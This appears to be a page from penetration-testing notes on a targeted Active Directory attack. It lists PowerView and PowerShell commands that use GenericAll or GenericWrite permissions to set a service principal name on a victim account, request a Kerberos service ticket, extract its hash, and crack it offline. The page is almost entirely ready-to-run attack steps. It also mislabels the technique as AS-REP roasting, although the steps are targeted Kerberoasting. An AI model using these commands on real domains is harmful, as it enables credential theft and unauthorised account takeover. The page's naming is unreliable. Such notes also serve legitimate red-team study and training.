TARGETED AS-REP ROASTING

Targeted AS-REP roasting is also known as Set-SPN attack

Checking "GenericAll" or "GenericWrite" permission on ACL to modify the SPN

Attacker should be a part of any AD object same as Victim

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "<OBJECT>"}

Enumerating whether the Victim has SPN

Get-DomainUser -Identity <USERNAME> | Select ServicePrincipalName

Forcefully setting SPN for the Victim

Set-DomainObject -Identity <USERNAME> -Set @{serviceprincipalname='DOMAIN/WHATEVER'} -Verbose

Verifying once, whether SPN is set or not

Requesting a new TGS for the SPN we set manually

Requesting a new TGS to the service from an user account

PowerView

Request-SPNTicket -SPN <SPN FQDN>

Get-DomainUser -Identity <USERNAME> | Get-DomainSPNTicket | Select -ExpandProperty Hash

Active Directory Module

Add-Type -AssemblyNAme System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList <SPN FQDN>

Verifying tickets using klist

CRACK

PreviousAS-REP ROASTING NextUNCONSTRAINED DELEGATION

Last updated 2 years ago